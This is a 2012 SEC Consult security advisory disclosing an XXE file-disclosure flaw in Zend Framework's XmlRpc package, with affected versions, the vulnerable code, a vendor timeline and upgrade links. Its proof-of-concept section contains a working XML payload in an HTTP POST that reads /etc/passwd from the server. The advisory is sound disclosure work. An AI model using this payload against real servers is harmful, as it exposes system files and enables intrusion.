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Message-ID: <20120626145933.067834d6@sec-consult.com>
Date: Tue, 26 Jun 2012 14:59:33 +0200
From: SEC Consult Vulnerability Lab <research@...-consult.com>
To: bugtraq <bugtraq@...urityfocus.com>
Subject: SEC Consult SA-20120626-0 :: Zend Framework - Local file disclosure
 via XXE injection

SEC Consult Vulnerability Lab Security Advisory < 20120626-0 >
=======================================================================
              title: Local file disclosure via XXE injection
            product: Zend Framework
 vulnerable version: 1.11.11
                     1.12.0 RC1
                     2.0.0 beta4
                     and earlier versions / branches
      fixed version: 1.11.12
                     1.12.0 RC2
                     2.0.0 beta5 / trunk
             impact: Critical
           homepage: http://framework.zend.com/
              found: 2012-06-18
                 by: K. Gudinavicius 
                     SEC Consult Vulnerability Lab 
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Extending the art & spirit of PHP, Zend Framework is based on simplicity,
object-oriented best practices, corporate friendly licensing, and a rigorously
tested agile codebase. Zend Framework is focused on building more secure,
reliable, and modern Web 2.0 applications & web services, and consuming widely
available APIs from leading vendors like Google, Amazon, Yahoo!, Flickr, as
well as API providers and cataloguers like StrikeIron and ProgrammableWeb."

Source: http://framework.zend.com/about/overview



Vulnerability overview/description:
-----------------------------------
The XmlRpc package of Zend Framework is vulnerable to XML eXternal Entity
Injection attacks (both server and client). The SimpleXMLElement class
(SimpleXML PHP extension) is used in an insecure way to parse XML data.
External entities can be specified by adding a specific DOCTYPE element to
XML-RPC requests. By exploiting this vulnerability an application may be
coerced to open arbitrary files and/or TCP connections.


Other software that uses the XmlRpc package of Zend Framework is then also
vulnerable to XML eXternal Entity Injection attacks!


Proof of concept:
-----------------
For example, the loadXml function (Zend\XmlRpc\Request.php and Response.php)
fails to disable external entities when parsing XML data. There is no call to
the libxml_disable_entity_loader function before initializing the
SimpleXMLElement class. Related code excerpt:

    public function loadXml($request)
    {
        if (!is_string($request)) {
            $this->_fault = new Zend_XmlRpc_Fault(635);
            $this->_fault->setEncoding($this->getEncoding());
            return false;
        }

        try {
            $xml = new SimpleXMLElement($request);
        } catch (Exception $e) {
            // Not valid XML
            $this->_fault = new Zend_XmlRpc_Fault(631);
            $this->_fault->setEncoding($this->getEncoding());
            return false;
        }
	
	[...]

	}

If a web application uses the Zend_XmlRpc_Server() class
(Zend\XmlRpc\Server.php) to handle XML-RPC requests, it is possible to
disclose arbitrary local files from the remote system. The following HTTP POST
request to the vulnerable XmlRpc server application illustrates the
exploitation of this vulnerability.

POST /xmlrpc_server.php HTTP/1.1
Host: $host

<?xml version="1.0"?>
 <!DOCTYPE foo [  
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
  <methodName>&xxe;</methodName>
</methodCall>



Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in versions 1.11.11 and 
2.0.0beta4 of Zend Framework, which were the most recent versions at 
the time of discovery.

Furthermore, previous versions and 1.12.0 RC1 are also affected.

Older branches are also affected but won't be fixed by Zend as they are not
maintained anymore. Their policy is to fix the current minor release
and the immediate previous minor release.


Vendor contact timeline:
------------------------
2012-06-18: Contacting vendor through zf-security@...d.com
2012-06-18: Vendor: Very fast reply, fixes issue already after 3 hours!
2012-06-18: Confirming server-side fix, adding recommendation for XmlRpc
            client code
2012-06-19: Vendor: XmlRpc client code also fixed
            Confirming fix
2012-06-20: Contacting local CERT
2012-06-20: Vendor: starts packaging, expected release of 1.11.12 and
            1.12.0RC2 by end of week, ZF2 trunk already fixed, next beta
            2.0.0beta5 will be released late next week
2012-06-22: Vendor: Packages are created and staged, packages and security
            announcement will be released on Monday
2012-06-25: New packages and Zend security advisory released by vendor
2012-06-26: SEC Consult releases security advisory



Solution:
---------
Upgrade to the latest version available, e.g.
* v1.11.12
* v1.12.0 RC2
* update ZF2 master trunk

If you are using an older branch you are urged to upgrade!

Zend framework security advisory:
http://framework.zend.com/security/advisory/ZF2012-01

Download link for new releases:
http://framework.zend.com/download/latest


Commits:
--------
http://framework.zend.com/code/log.php?repname=Zend+Framework&path=%2F

* Zend Framework 1.X
  Trunk:
  http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2Ftrunk&rev=24970&peg=24970
  http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2F&rev=24975

* 1.11.X:
  http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2Fbranches%2F&rev=24971&peg=24971
  http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2Fbranches%2F&rev=24972&peg=24972
  http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2F&rev=24976

* 1.12.0: 
  http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2Fbranches%2F&rev=24973&peg=24973
  http://framework.zend.com/code/revision.php?repname=Zend+Framework&path=%2F&rev=24977

* Zend Framework 2.0
  https://github.com/zendframework/zf2/pull/1523


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/advisories.html


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Mail: research at sec-consult dot com
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EOF K. Gudinavicius, J. Greil / @2012

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